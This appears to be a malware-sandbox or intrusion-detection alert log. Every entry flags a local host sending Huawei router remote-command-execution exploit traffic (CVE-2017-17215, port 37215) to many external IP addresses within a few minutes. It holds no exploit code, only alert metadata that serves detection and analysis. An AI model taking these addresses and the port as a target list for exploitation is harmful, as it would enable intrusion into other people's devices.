                                            06/14/24-10:44:08.521650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122237215192.168.2.14197.210.146.60
                                            06/14/24-10:44:02.365636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018637215192.168.2.14197.89.252.121
                                            06/14/24-10:43:39.813311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628437215192.168.2.1441.160.145.89
                                            06/14/24-10:44:00.326199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355037215192.168.2.14197.50.46.239
                                            06/14/24-10:43:50.112279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568037215192.168.2.14197.226.228.122
                                            06/14/24-10:44:16.718808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748637215192.168.2.14156.28.129.222
                                            06/14/24-10:44:20.831363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663237215192.168.2.14197.125.43.2
                                            06/14/24-10:44:24.932732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672837215192.168.2.1441.156.50.2
                                            06/14/24-10:43:39.789827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532437215192.168.2.1441.12.90.23
                                            06/14/24-10:44:33.152436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253637215192.168.2.14156.250.139.228
                                            06/14/24-10:44:02.382695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392437215192.168.2.1441.4.50.102
                                            06/14/24-10:43:52.146198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535437215192.168.2.14197.139.59.59
                                            06/14/24-10:43:52.150757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472237215192.168.2.14197.187.143.194
                                            06/14/24-10:44:04.412248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926637215192.168.2.14197.98.198.9
                                            06/14/24-10:44:00.343325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266037215192.168.2.14156.207.4.137
                                            06/14/24-10:44:00.341235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243837215192.168.2.14156.25.3.89
                                            06/14/24-10:43:50.113964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523637215192.168.2.14156.65.76.20
                                            06/14/24-10:44:29.012865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790237215192.168.2.1441.113.229.47
                                            06/14/24-10:44:18.764014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124037215192.168.2.1441.182.93.74
                                            06/14/24-10:44:18.765803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281637215192.168.2.14197.246.210.96
                                            06/14/24-10:44:20.830105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794237215192.168.2.14197.18.159.169
                                            06/14/24-10:44:31.081959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842637215192.168.2.14156.191.140.153
                                            06/14/24-10:44:20.827618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856237215192.168.2.1441.92.139.46
                                            06/14/24-10:44:04.411072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392837215192.168.2.14156.136.62.134
                                            06/14/24-10:43:36.729444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069437215192.168.2.14156.81.47.229
                                            06/14/24-10:43:37.763184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708637215192.168.2.14197.66.87.230
                                            06/14/24-10:43:43.968693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574237215192.168.2.1441.14.111.33
                                            06/14/24-10:44:27.000335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819437215192.168.2.14197.162.18.172
                                            06/14/24-10:44:27.001296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001037215192.168.2.14197.220.206.166
                                            06/14/24-10:43:34.676607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073037215192.168.2.14156.74.213.254
                                            06/14/24-10:43:39.813102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619037215192.168.2.1441.156.151.91
                                            06/14/24-10:44:16.716612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789037215192.168.2.1441.30.102.243
                                            06/14/24-10:44:22.861740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179237215192.168.2.14197.191.7.25
                                            06/14/24-10:44:31.052293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080637215192.168.2.14156.111.45.59
                                            06/14/24-10:43:48.029256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604037215192.168.2.1441.136.168.80
                                            06/14/24-10:44:02.365457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193437215192.168.2.14156.24.122.179
                                            06/14/24-10:44:31.050793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491237215192.168.2.14197.79.154.119
                                            06/14/24-10:44:20.806950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163437215192.168.2.14197.57.222.217
                                            06/14/24-10:43:34.663517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987437215192.168.2.1441.221.245.45
                                            06/14/24-10:43:48.030269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499437215192.168.2.14156.62.118.163
                                            06/14/24-10:44:22.878388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861237215192.168.2.14197.14.38.108
                                            06/14/24-10:44:02.366157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852237215192.168.2.14156.195.84.109
                                            06/14/24-10:43:45.969565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631637215192.168.2.14156.100.41.193
                                            06/14/24-10:43:41.899180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869237215192.168.2.14156.26.158.207
                                            06/14/24-10:44:18.763885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.14197.110.251.141
                                            06/14/24-10:44:26.980105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177237215192.168.2.14156.249.138.11
                                            06/14/24-10:43:50.073634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701437215192.168.2.14156.134.131.45
                                            06/14/24-10:44:14.666573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566637215192.168.2.1441.232.149.139
                                            06/14/24-10:44:16.718269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955637215192.168.2.1441.73.243.124
                                            06/14/24-10:44:02.367643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084637215192.168.2.14197.48.127.124
                                            06/14/24-10:43:43.968103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122437215192.168.2.14156.140.1.110
                                            06/14/24-10:43:50.071172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935237215192.168.2.1441.208.150.216
                                            06/14/24-10:43:54.186431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693637215192.168.2.14156.86.223.102
                                            06/14/24-10:44:12.618666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778037215192.168.2.1441.57.96.221
                                            06/14/24-10:43:41.910457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295237215192.168.2.14156.182.42.75
                                            06/14/24-10:44:00.321655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976837215192.168.2.14156.136.245.105
                                            06/14/24-10:43:48.031208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353637215192.168.2.14156.47.139.32
                                            06/14/24-10:44:02.367404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304837215192.168.2.1441.85.213.235
                                            06/14/24-10:44:26.977526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094437215192.168.2.14156.45.27.148
                                            06/14/24-10:44:10.544683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782237215192.168.2.1441.206.75.9
                                            06/14/24-10:43:54.202062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177437215192.168.2.14156.28.143.143
                                            06/14/24-10:44:20.803222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567037215192.168.2.14197.12.229.84
                                            06/14/24-10:43:43.941838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997037215192.168.2.14197.153.255.124
                                            06/14/24-10:43:52.163518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4938637215192.168.2.1441.255.125.157
                                            06/14/24-10:44:22.882704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300237215192.168.2.1441.153.62.180
                                            06/14/24-10:44:14.672015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970637215192.168.2.14156.97.111.185
                                            06/14/24-10:43:36.703770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906637215192.168.2.1441.71.86.236
                                            06/14/24-10:43:36.704463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4448637215192.168.2.14156.83.121.141
                                            06/14/24-10:43:48.019557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6047037215192.168.2.1441.18.123.158
                                            06/14/24-10:43:56.224720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085037215192.168.2.1441.95.7.194
                                            06/14/24-10:44:24.947315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065037215192.168.2.1441.112.94.89
                                            06/14/24-10:44:10.548560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776437215192.168.2.14197.168.77.180
                                            06/14/24-10:44:31.086249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375437215192.168.2.14197.112.71.219
                                            06/14/24-10:43:39.792891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413037215192.168.2.14156.33.234.192
                                            06/14/24-10:44:06.472258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562237215192.168.2.1441.96.80.90
                                            06/14/24-10:44:22.860637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.90.131.125
                                            06/14/24-10:43:54.182760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913837215192.168.2.1441.131.124.108
                                            06/14/24-10:44:14.668018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4495437215192.168.2.1441.106.77.71
                                            06/14/24-10:43:36.717107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705237215192.168.2.1441.100.116.144
                                            06/14/24-10:44:31.054602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600837215192.168.2.14156.216.209.157
                                            06/14/24-10:43:36.725941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840437215192.168.2.14156.211.212.107
                                            06/14/24-10:44:20.805790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967237215192.168.2.1441.45.228.40
                                            06/14/24-10:43:52.150058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198637215192.168.2.14197.42.255.151
                                            06/14/24-10:44:31.052165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488037215192.168.2.14156.200.185.88
                                            06/14/24-10:44:02.369098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641237215192.168.2.14156.154.20.19
                                            06/14/24-10:43:54.200711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288837215192.168.2.1441.161.69.131
                                            06/14/24-10:43:54.185897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281237215192.168.2.1441.179.184.157
                                            06/14/24-10:44:20.828153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735837215192.168.2.1441.208.241.117
                                            06/14/24-10:43:56.227099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923437215192.168.2.1441.105.69.36
                                            06/14/24-10:44:10.568808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875237215192.168.2.14156.170.195.53
                                            06/14/24-10:44:24.916139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828637215192.168.2.14197.87.184.127
                                            06/14/24-10:44:24.943485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106237215192.168.2.1441.204.92.66
                                            06/14/24-10:43:54.201359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070037215192.168.2.1441.175.45.73
                                            06/14/24-10:43:45.967082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827037215192.168.2.14197.0.58.100
                                            06/14/24-10:44:00.339083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098037215192.168.2.1441.36.106.50
                                            06/14/24-10:44:20.806558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292437215192.168.2.14197.127.161.42
                                            06/14/24-10:43:45.966055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710237215192.168.2.14156.56.182.207
                                            06/14/24-10:44:12.618619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659637215192.168.2.14197.157.190.194
                                            06/14/24-10:43:48.028363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238437215192.168.2.1441.148.207.6
                                            06/14/24-10:43:37.761948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565437215192.168.2.1441.67.52.19
                                            06/14/24-10:44:27.000256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026437215192.168.2.14197.8.245.242
                                            06/14/24-10:43:39.811399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190237215192.168.2.14197.139.209.224
                                            06/14/24-10:43:50.072078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573437215192.168.2.14197.54.46.90
                                            06/14/24-10:44:20.803873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577237215192.168.2.1441.216.239.104
                                            06/14/24-10:44:18.779891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063237215192.168.2.14197.215.37.147
                                            06/14/24-10:44:24.913699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871837215192.168.2.1441.244.125.60
                                            06/14/24-10:44:16.735568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936437215192.168.2.14197.89.217.219
                                            06/14/24-10:43:34.662201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081637215192.168.2.1441.162.173.241
                                            06/14/24-10:44:06.469615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720037215192.168.2.14197.186.111.102
                                            06/14/24-10:44:22.878903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471837215192.168.2.14156.168.41.34
                                            06/14/24-10:43:39.810107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519037215192.168.2.14156.115.84.103
                                            06/14/24-10:43:54.186256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339237215192.168.2.1441.183.15.125
                                            06/14/24-10:43:36.702509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313837215192.168.2.1441.217.92.133
                                            06/14/24-10:43:45.985001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490437215192.168.2.14197.220.63.107
                                            06/14/24-10:44:31.085265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747637215192.168.2.14197.25.177.65
                                            06/14/24-10:43:43.969529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760037215192.168.2.1441.129.132.162
                                            06/14/24-10:44:08.519490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684637215192.168.2.1441.147.212.66
                                            06/14/24-10:44:22.878734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074637215192.168.2.14156.163.15.33
                                            06/14/24-10:43:36.703214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123237215192.168.2.14156.247.6.235
                                            06/14/24-10:43:52.143684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435637215192.168.2.1441.128.96.82
                                            06/14/24-10:43:56.245083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184037215192.168.2.14156.55.149.113
                                            06/14/24-10:44:18.776454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010837215192.168.2.1441.110.12.167
                                            06/14/24-10:44:24.915917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853237215192.168.2.1441.248.227.166
                                            06/14/24-10:44:31.090861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395037215192.168.2.1441.71.180.143
                                            06/14/24-10:43:56.226614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059837215192.168.2.1441.219.14.236
                                            06/14/24-10:44:12.615881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697437215192.168.2.14156.85.252.101
                                            06/14/24-10:43:48.032855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4753637215192.168.2.14197.190.45.10
                                            06/14/24-10:43:36.704960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608637215192.168.2.14156.152.18.16
                                            06/14/24-10:44:31.083916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593037215192.168.2.14197.113.220.86
                                            06/14/24-10:44:00.324772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567637215192.168.2.14197.51.62.143
                                            06/14/24-10:44:29.023635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979837215192.168.2.1441.42.115.207
                                            06/14/24-10:43:58.275439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4485637215192.168.2.14197.79.227.238
                                            06/14/24-10:44:33.150784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400037215192.168.2.14156.163.23.45
                                            06/14/24-10:44:04.420009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310037215192.168.2.1441.180.79.54
                                            06/14/24-10:44:00.343390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909637215192.168.2.14197.23.144.42
                                            06/14/24-10:44:33.151146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442237215192.168.2.14156.133.73.40
                                            06/14/24-10:43:36.724062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578037215192.168.2.14156.117.60.7
                                            06/14/24-10:43:58.291743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655037215192.168.2.14197.217.248.156
                                            06/14/24-10:43:43.944033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855037215192.168.2.14197.76.191.250
                                            06/14/24-10:43:37.760411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668637215192.168.2.1441.177.59.243
                                            06/14/24-10:44:16.716765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117637215192.168.2.14156.163.26.122
                                            06/14/24-10:43:54.186565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543037215192.168.2.14156.216.198.120
                                            06/14/24-10:44:00.336892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803037215192.168.2.14197.102.2.133
                                            06/14/24-10:44:29.011703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486237215192.168.2.1441.254.237.83
                                            06/14/24-10:44:27.000097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201637215192.168.2.14156.70.203.157
                                            06/14/24-10:44:16.716969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234437215192.168.2.14156.243.132.207
                                            06/14/24-10:44:31.051770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539637215192.168.2.14156.10.157.81
                                            06/14/24-10:43:39.813199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418037215192.168.2.1441.221.11.44
                                            06/14/24-10:43:56.229804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315237215192.168.2.1441.92.101.122
                                            06/14/24-10:44:02.369245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366037215192.168.2.14197.6.43.0
                                            06/14/24-10:44:33.152470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723237215192.168.2.14197.189.183.185
                                            06/14/24-10:43:36.724643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852037215192.168.2.14197.130.253.152
                                            06/14/24-10:43:52.148764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527437215192.168.2.14156.134.87.80
                                            06/14/24-10:44:20.805354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552237215192.168.2.1441.152.246.121
                                            06/14/24-10:44:29.010582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667237215192.168.2.14156.254.58.255
                                            06/14/24-10:44:31.089724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698237215192.168.2.14156.216.102.66
                                            06/14/24-10:44:00.326645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920437215192.168.2.1441.203.157.130
                                            06/14/24-10:43:50.074158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335837215192.168.2.14197.208.249.192
                                            06/14/24-10:44:22.883045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793437215192.168.2.1441.184.154.71
                                            06/14/24-10:44:08.501788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3375437215192.168.2.14197.90.40.79
                                            06/14/24-10:43:34.661972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4697037215192.168.2.14156.54.177.90
                                            06/14/24-10:43:36.725233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078237215192.168.2.14156.99.14.71
                                            06/14/24-10:44:10.544979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653637215192.168.2.1441.90.111.135
                                            06/14/24-10:44:08.505106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199237215192.168.2.1441.78.62.134
                                            06/14/24-10:43:52.160806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436437215192.168.2.14197.197.171.80
                                            06/14/24-10:43:54.183199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889437215192.168.2.1441.153.90.204
                                            06/14/24-10:44:04.411492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734837215192.168.2.14197.223.216.28
                                            06/14/24-10:44:10.549117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078437215192.168.2.14197.165.178.157
                                            06/14/24-10:44:29.012181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419437215192.168.2.14197.203.156.33
                                            06/14/24-10:44:31.084253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029837215192.168.2.14156.31.2.27
                                            06/14/24-10:44:33.134118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418437215192.168.2.1441.211.6.179
                                            06/14/24-10:43:34.677859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029437215192.168.2.14156.33.12.217
                                            06/14/24-10:43:43.969051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4953037215192.168.2.14156.236.35.236
                                            06/14/24-10:44:29.009379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164037215192.168.2.14156.141.33.94
                                            06/14/24-10:43:52.146097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521437215192.168.2.14156.192.19.8
                                            06/14/24-10:44:24.935138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960037215192.168.2.14197.196.36.12
                                            06/14/24-10:43:45.969202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305037215192.168.2.14156.254.238.223
                                            06/14/24-10:44:12.618815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940037215192.168.2.14197.90.163.156
                                            06/14/24-10:43:50.073715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3391837215192.168.2.14197.110.137.247
                                            06/14/24-10:43:54.201844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272037215192.168.2.1441.44.254.90
                                            06/14/24-10:44:35.177374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265437215192.168.2.14156.231.138.241
                                            06/14/24-10:43:54.202777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911637215192.168.2.14197.220.28.240
                                            06/14/24-10:44:04.421406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544037215192.168.2.1441.20.242.120
                                            06/14/24-10:43:41.899047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789637215192.168.2.1441.51.169.158
                                            06/14/24-10:43:41.847670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953037215192.168.2.14197.233.17.165
                                            06/14/24-10:44:08.517901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327437215192.168.2.1441.230.194.68
                                            06/14/24-10:43:45.990751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.14156.104.222.77
                                            06/14/24-10:44:00.322377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652237215192.168.2.14156.203.54.210
